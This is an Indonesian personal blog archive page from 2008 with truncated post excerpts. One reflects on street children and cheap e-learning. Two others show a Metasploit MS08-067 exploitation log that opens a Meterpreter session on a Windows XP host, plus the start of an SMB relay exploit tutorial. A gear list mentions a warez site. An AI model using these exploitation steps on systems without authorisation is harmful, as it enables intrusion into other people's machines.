Posts

Showing posts from November 30, 2008

Anak Bus & Sekolah Maya

Ini duniaku mungkin sama dengan duniamu ..

Malam ini mataku sempat terbelak betapa tidak seorang bocah jalanan tertidur dibelakang sebuah bus patas , terlelap mungkin di mimpinya dia tidur diatas kasur yang empuk .. begitu bangun dia sadar diantara kekejaman dunia, aku bisa melihatnya disela pintu itu , tanya ku ini salah siapa ?

UUD 1945 pasal 34 ayat 1 mengamanatkan, fakir miskin dan anak terlantar
dipelihara oleh negara.

Sebenernya dunia pendidikan bisa dinikmati rakyat biasa bahkan menembus lapisan masyarakat miskin tidak jor jor hanya ucapan semata ...

Dunia informasi dan teknologi harusnya bisa mengangkat semua itu , pendidikan murah melalui media internet e-learning seharusnya mudah didapat kalau perlu disediakan gratis beserta komputer - komputer daripada cuma pom bensin , supermarket , sentral bisnis , dll yang hanya memperjauh GAP kaya dan miskin ..

Edukasi lebih bersifat ke teknologi saat ini masih belum tercapai sasaran tuh * ...

saya tidak habis pikir kok kemana ya semua it…

Lanjutan Exploit windows Universal

[*] Meterpreter session 11 closed.
msf exploit(ms08_067_netapi) > set RHOST 10.11.21.186
RHOST => 10.11.21.186
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 12 opened (10.11.21.200:19393 -> 10.11.21.186:4444)

meterpreter > ps x

Process list
============

PID Name Path
--- ---- ----
256 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
492 i2050.exe C:\Program Files\Nortel\IP Softphone 2050\i2050.exe

Exploit Windows Universal dengan Tools Framework - Metasploit dan SMB Relay (hdm)

Ada apa dengan MS08-067 ? berikut penjelasannya …
Kali ini saya mencoba share kepada semua bagaimana saya menerapkan metode exploit SMB relay Client, mencoba mengakses SMB service , dimana attacker dapat menerobos Samba jika mereka menjalankan internet explorer atau outlook express.
Metode ini dipublish oleh Sir Dystic selama @tlantacon pada tahun 2001 dan di implementasikan pada metasploit juli 2007. hal ini yang membuat rasa penasaran saya bagaimana metode exploit itu dijalankan , berikut artikel yang saya buat.
Download metasploit framework terbaru atau bisa mengunjungi http://www.metasploit.com

root@boc [~/metasploit]# wget http://spool.metasploit.com/releases/framework-3.2.tar.gz
root@boc [~/metasploit]# tar -zxvf framework-3.2.tar.gz
root@boc [~/metasploit]# cd framework-3.2
mroot@boc [~/metasploit/framework-3.2]# ./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### …

Logika Antar Maya - InetStuff

Image
Nih stuff saya yang sering saya pakai istilah kata sih alat perang *

disini kasih tau aja deh mulai urutan dari 1 sampai 16

1. Laptop Zyrex centrino 1.6 , ram 512 , hardisk 40 GB , OS nya backtrack 3 dan windows xp , nih sering dipake buat oprek oprek internet menjelajah dunia maya .

2. Simbada speaker duh lupa nih versi berapa , suaranya cukup lumayan ampuh buat ganggu tetangga sebelah rumah.

3. Hardisk external hitachi 320 GB buat taruh mulai dari data , software sampai film2x yang bagus, biasanya sih sourcenya dari www.warez-bb.org .

4. HP nexian dual GSM + CDMA nih hp sering dipake buat nelpon2x tapi sayang batere nya cepet abis 2 hari langsung go to go

5. Kacamata + Dompet , mata emang minus setengah sih , dompet buat simpen uang , transaksi , bayar charge internet dll

6. Laptop fujitsu , pentium 4 - 768 Ramnya OS windows xp , hardisk 60 GB sering dibawa bawa ke kantor ( pinjeman sih :D ).

7. Tas laptop merk HP dulu beli di www.jakartanotebook.com nih tas udah setahun awet juga.

8. Kab…